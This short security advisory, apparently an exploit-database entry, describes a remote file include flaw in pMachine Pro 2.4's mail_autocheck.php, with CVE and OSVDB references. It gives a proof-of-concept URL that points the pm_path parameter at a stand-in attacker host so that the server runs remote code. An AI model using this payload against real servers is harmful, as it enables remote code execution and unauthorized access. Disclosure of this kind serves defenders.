source: http://www.securityfocus.com/bid/12597/info PMachine Pro is reported prone to a remote file include vulnerability. This issue affects the 'mail_autocheck.php' script. An attacker may leverage this issue to execute arbitrary server-side script code on an affected computer with the privileges of the Web server process. This will facilitate unauthorized access. The latest version (2.4) of pMachine Pro is reported vulnerable. It is possible that other versions are affected as well. http://www.example.com/pMachine/pm/add_ons/mail_this_entry/mail_autocheck.php?pm_path=http://attackers-webserver/malicious-code.php?
Related ExploitsTrying to match CVEs (1): CVE-2005-0513
Trying to match OSVDBs (1): 14028
Other Possible E-DB Search Terms: PMachine Pro 2.4, PMachine Pro
|2008-01-14||31027||pMachine Pro 2.4.1 - Multiple Cross-Site Scripting Vulnerabilities||fuzion|